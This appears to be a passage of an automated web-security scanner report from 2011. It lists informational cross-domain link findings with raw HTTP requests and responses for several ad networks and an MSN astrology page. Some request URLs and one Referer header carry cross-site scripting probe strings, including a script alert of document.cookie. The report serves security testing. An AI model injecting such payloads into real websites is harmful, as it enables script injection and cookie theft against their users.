Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:39:17 GMT; path=/
Set-Cookie: i_34=8:45:27:7:0:34115:1296351557:B2|8:47:27:7:0:32725:1294844800:B2; expires=Tue, 01-Mar-2011 01:39:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2445

   function wsod_flash() {
       document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="300" height="250" id="W_8_45_27" align="middle">');
       document.write('<param name="salign
...[SNIP]...
</object>');
       document.close();
   }
   wsod_flash();
               document.write('<img src="http://ad.doubleclick.net/imp;v1;f;233976259;0-0;0;57903135;1|1;39902686|39920473|1;;cs=h;pc=WSOD;%3fhttp://ad.doubleclick.net/dot.gif?1296351557" width = "1" height = "1" border = "0">');
           

22.32. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 17:25:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 17:25:37 GMT; path=/
Set-Cookie: i_34=8:45:5:7:0:34115:1296408337:B2|8:47:27:7:0:32725:1294844800:B2; expires=Tue, 01-Mar-2011 17:25:37 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2438

   function wsod_flash() {
       document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="300" height="250" id="W_8_45_5" align="middle">');
       document.write('<param name="salign"
...[SNIP]...
</object>');
       document.close();
   }
   wsod_flash();
               document.write('<img src="http://ad.doubleclick.net/imp;v1;f;233976259;0-0;0;57903135;1|1;39902686|39920473|1;;cs=h;pc=WSOD;%3fhttp://ad.doubleclick.net/dot.gif?1296408337" width = "1" height = "1" border = "0">');
           

22.33. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:28:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:28:06 GMT; path=/
Set-Cookie: i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; expires=Tue, 01-Mar-2011 01:28:06 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2438

   function wsod_flash() {
       document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="300" height="250" id="W_8_45_5" align="middle">');
       document.write('<param name="salign"
...[SNIP]...
</object>');
       document.close();
   }
   wsod_flash();
               document.write('<img src="http://ad.doubleclick.net/imp;v1;f;233976259;0-0;0;57903135;1|1;39902686|39920473|1;;cs=h;pc=WSOD;%3fhttp://ad.doubleclick.net/dot.gif?1296350886" width = "1" height = "1" border = "0">');
           

22.34. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /pixel?id=1051114&t=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:50 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 30 Jan 2011 01:23:50 GMT
Pragma: no-cache
Content-Length: 167
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1037875620/?label=nOCpCPKW9QEQpPPy7gM&amp;guid=ON&amp;script=0" />');

22.35. http://add.my.yahoo.com/rss

Summary

Severity:   Information
Confidence:   Certain
Host:   http://add.my.yahoo.com
Path:   /rss

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /rss?url= HTTP/1.1
Host: add.my.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:05:18 GMT
Set-Cookie: B=2aojljp6k9hqu&b=3&s=ch; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 3312

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 404 Not Found</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,h
...[SNIP]...
<a href="http://us.rd.yahoo.com/404/*http://www.yahoo.com"><img
src=http://l.yimg.com/a/i/yahoo.gif
width=147 height=31 border=0 alt="Yahoo!">
</a>
...[SNIP]...

22.36. http://ads.asp.net/a.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.asp.net
Path:   /a.aspx

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /a.aspx?Task=Click&ZoneID=37&CampaignID=1887&AdvertiserID=2&BannerID=2555&SiteID=2&RandomNumber=1776744983&Keywords= HTTP/1.1
Host: ads.asp.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.infragistics.com/redirects/SLNetDec1610SL4-WPF-DC
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Set-Cookie: ASP.NET_SessionId=5zm5r4vkiruwbqz3nggspz55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5zm5r4vkiruwbqz3nggspz55; path=/; HttpOnly
Set-Cookie: %24SPIDER=False; path=/
Set-Cookie: %24CC=US; expires=Sun, 30-Jan-2011 23:22:00 GMT; path=/
Set-Cookie: %24RC=TX; expires=Sun, 30-Jan-2011 23:22:00 GMT; path=/
Set-Cookie: %24MC=0; expires=Sun, 30-Jan-2011 23:22:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:59 GMT
Connection: close
Content-Length: 177

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.infragistics.com/redirects/SLNetDec1610SL4-WPF-DC">here</a>.</h2>
</body></html>

22.37. http://ads.neudesicmediagroup.com/a.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.neudesicmediagroup.com
Path:   /a.aspx

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /a.aspx?Task=Click&ZoneID=58&CampaignID=515&AdvertiserID=31&BannerID=368&SiteID=6&RandomNumber=1141796034&Keywords= HTTP/1.1
Host: ads.neudesicmediagroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARRAffinity=4d2595d3360958e1a13d6a0752f068ec43e5a9f153c5cfa82e99d6cafccefb25;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 287
Content-Type: text/html; charset=utf-8
Location: http://www.componentone.com/SuperProducts/StudioEnterprise/Charts/?utm_source=neudesic%2Bron&utm_medium=banner&utm_content=charts%2B728x90&utm_campaign=2010v3
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-AspNet-Version: 2.0.50727
Set-Cookie: %24CC=US; expires=Sun, 30-Jan-2011 23:22:04 GMT; path=/
Set-Cookie: %24RC=TX; expires=Sun, 30-Jan-2011 23:22:04 GMT; path=/
Set-Cookie: %24MC=0; expires=Sun, 30-Jan-2011 23:22:04 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:22:03 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.componentone.com/SuperProducts/StudioEnterprise/Charts/?utm_source=neudesic%2Bron&amp;utm_medium=banner&amp;utm_content=charts%2B728x90&amp;utm_campaign=2010v3">here</a>
...[SNIP]...

22.38. http://analytics.live.com/Sync.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.live.com
Path:   /Sync.html

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /Sync.html?V=3525&AQNT=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: analytics.live.com
If-Modified-Since: Mon, 08 Jun 2009 11:01:13 GMT
If-None-Match: "eff9f76f28e8c91:a04"
Proxy-Connection: Keep-Alive
Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; wlidperf=throughput=5&latency=610

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:5c8"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:36 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
...[SNIP]...
</script>
<iframe id="_msnFrame" src="//analytics.redacted/Include.html" style="z-index:-1;height:1px;width:1px;display:none;visibility:hidden;"></iframe>
...[SNIP]...

22.39. http://assets.tumblr.com/iframe.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets.tumblr.com
Path:   /iframe.html

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /iframe.html?8&src=http%3A%2F%2Finformationarbitrage.com%2Fpost%2F3007820135%2Fstart-fund-no-big-deal-business-as-usual&pid=3007820135&rk=GHuYv0bI&lang=en_US&name=informationarbitrage HTTP/1.1
Host: assets.tumblr.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 14:47:56 GMT
ETag: "e0002-e18-49039beb65a80+gzip"
Last-Modified: Tue, 14 Sep 2010 15:19:54 GMT
Server: ECS (dca/532D)
Vary: Accept-Encoding
X-Cache: HIT
X-Tumblr-Usec: D=446
Content-Length: 3608

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
   
    <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

22.40. http://astrocenter.astrology.redacted/msn/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://astrocenter.astrology.redacted
Path:   /msn/Default.aspx

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /msn/Default.aspx?When=0&Af=-1000&VS&Af=-1000 HTTP/1.1
Host: astrocenter.astrology.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92574
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:42:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fre
...[SNIP]...
<meta name="robots" CONTENT="index,follow,all">
<link rel="shortcut icon" href="http://www.astrocenter.com/us/center.ico">
<meta http-equiv="PICS-Label" content='(pics-1.0 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "Microsoft Network" on "1996.04.16T08:15-0500" r (n 0 s 0 v 0 l 0))'>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.astrocenter.com/us/js/center-horoscope.js"></script>
...[SNIP]...
</div>
           <img src="http://www.astrocenter.com/us/images/PE.png" align="center"><br>
...[SNIP]...
<li><a href="http://video.msnbc.com/">Video</a>
...[SNIP]...
<li class="c3">
                                   <a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li class="first"><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li>
       <a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li>
       <a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li>
       <a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li>
       <a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li>
       <a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li>
       <a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo">
                               <a href="http://www.bing.com/search?FORM=A18">Bing</a>
...[SNIP]...
<li id="msg" class="last"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search?form=A18">Search the web</a>
...[SNIP]...
</strong>
                       <a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div>
<img src="http://msnportalastrology.112.2O7.net/b/ss/msnportalastrology/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="special" ><a class="special" href=http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000>Charts & Reports</a>
...[SNIP]...
<li ><a href=http://www.psychiccenter.com/TelephonyMSN/Phone/Welcome.aspx?Af=-1000>PsychicCenter</a>
...[SNIP]...
<a href="javascript:centeredPopup('popup/WhatsIncluded.aspx', 470, 330, 'scrollbars=0,status=0,toolbar=0,location=0');"><img src="http://www.astrocenter.com/us/images/info.gif" align="absmiddle" style="display:inline;width:11px;height:11px" border="0" alt="More Information about Personalized Horoscopes"></a>
...[SNIP]...
<div class="unpDottedLine"><img src="http://www.astrocenter.com/us/images/spacer.gif" width="296" height="1" border="0" title="" alt=""></div>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=0&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_0.png" alt="Aries" title="Aries" border="0">Aries</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=1&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_1.png" alt="Taurus" title="Taurus" border="0">Taurus</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=2&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_2.png" alt="Gemini" title="Gemini" border="0">Gemini</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=3&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_3.png" alt="Cancer" title="Cancer" border="0">Cancer</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=4&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_4.png" alt="Leo" title="Leo" border="0">Leo</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=5&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_5.png" alt="Virgo" title="Virgo" border="0">Virgo</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=6&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_6.png" alt="Libra" title="Libra" border="0">Libra</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=7&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_7.png" alt="Scorpio" title="Scorpio" border="0">Scorpio</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=8&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_8.png" alt="Sagittarius" title="Sagittarius" border="0">Sagittarius</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=9&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_9.png" alt="Capricorn" title="Capricorn" border="0">Capricorn</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=10&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_10.png" alt="Aquarius" title="Aquarius" border="0">Aquarius</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/Default.aspx?Sign=11&Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/UnpersSign_11.png" alt="Pisces" title="Pisces" border="0">Pisces</a>
...[SNIP]...
<h2><a class="moduleTitleViolet" style="font-size:11px;" href="http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000">What's New</a>
...[SNIP]...
<div style="padding:5px 10px 5px 10px">This website is <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="adobeUpgrade"><u>even better</u></a> with the latest version of Adobe Flash Player. Plus, it's FREE. Get it <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="adobeUpgrade"><u>
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="302" height="337" id="m5L2" align="middle">
   <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptLove.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_love.png" class="icn" title="Love Horoscopes" alt="Love Horoscopes"></a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptNumerology.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_numerology.png" class="icn" title="Numerology" alt="Numerology"></a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptTarot.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_tarot.png" class="icn" title="Daily Tarot" alt="Daily Tarot"></a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/DeptChin.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/horoscopeModule/icon_Chinese.png" class="icn" title="Chinese Horoscopes" alt="Chinese Horoscopes"></a>
...[SNIP]...
<h2><a class="t8wht" href="http://www.astrocenter.com/msn/HPChartsAndReports.aspx?Af=-1000"><b>
...[SNIP]...
<a href='buyStEdCh2K2.aspx'><img src="http://www.astrocenter.com/us/images/_sh/pict_60/pict_StEdCh2K2_60.png" alt="2011 Chinese Horoscope" title="2011 Chinese Horoscope" width="60" border="0"></a>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000" class="moduleTitle" style="font-size:12px; text-transform:uppercase;">2011 Love Tarot - <font style="color:red;">
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdTTL_120.png" width="120" height="120" alt="Stack your deck for love!" title="Stack your deck for love!" border="0"></a></div>
       <div class="standard11" style="text-align:left; height:120px;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000">This 13-card reading illustrates the romantic atmosphere of each month, as well as the end result! With your 2011 Love Tarot Reading, you'll know how to get what you want, whether it's a hot fling or a
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdTTL&Af=-1000">Get your reading &#187;</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/buyStEdMo.aspx?Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_misc/pict_gen_DidYouKnow_90x110.jpg" width="90" height="110" border="0" title="Did You Know? - Your Inner Child and Astrology" alt="Did You Know? - Your Inner Child and Astrology"></a>
...[SNIP]...
<li><a class="prodClick12" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdAP&Af=-1000">Get your AstroProfile!</a>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000" class="moduleTitle" style="font-size:12px; text-transform:uppercase;">2011 Vedic Forecast - <font style="color:red;">
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdVY_120.png" width="120" height="120" alt="Bring your desires to life!" title="Bring your desires to life!" border="0"></a></div>
       <div class="standard11" style="text-align:left; height:120px;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000">Try a unique take on your future! Use the ancient system of Vedic astrology to gain insight with your 2011 Vedic Horoscope! This report takes a holistic approach to integrate your higher, spiritual asp
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdVY&Af=-1000">Get your report &#187;</a>
...[SNIP]...
<a HREF="http://astrocenter.astrology.redacted/msn/ArticleAstrologyHomeV2.aspx?Af=-1000"><img SRC="http://www.astrocenter.com/us/images/Articles/ast_20100125_145.jpg" WIDTH="145" HEIGHT="232" border="1" alt="5 Myths About Love" title="5 Myths About Love"></img>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000" class="moduleTitle" style="font-size:12px; text-transform:uppercase;">Love Score</a>
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_StEdLS_120.png" width="120" height="120" alt="How do you rate with your mate?" title="How do you rate with your mate?" border="0"></a></div>
       <div class="standard11" style="text-align:left; height:120px;"><a class="prodDesc" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">This unique synastry report rates your relationship potential based on seven key factors. It's fun, easy-to-read, and accurate. Love isn't logical, but it makes a lot more sense when you know the score
...[SNIP]...
<div style="text-align:right;"><a class="prodClick" href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdLS&Af=-1000">Get your report &#187;</a>
...[SNIP]...
<a href="http://astrocenter.astrology.redacted/msn/HPDream.aspx?Af=-1000#FeaturedDream"><img src="http://www.astrocenter.com/us/images/_sh/pict_120/pict_gen_FeaturedDream_120.png" width="120" height="120" border="0" title="Featured Dream Interpretation" alt="Featured Dream Interpretation"></a>
...[SNIP]...
<h2><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000" class="moduleTitle" style="font-size:12px;">In-depth Insight: 2011 Horoscope - <font style="color:red;">
...[SNIP]...
<div class="ctrImg1"><a href="http://store.astrocenter.com/msn/store/buy/default.asp?De=StEdFr2K11&Af=-1000"><img src="http://www.astrocenter.com/us/images/_sh/pict_145/pict_StEdFr2K2_145.png" width="145" height="232" alt="" title="" border="0"></a></div>
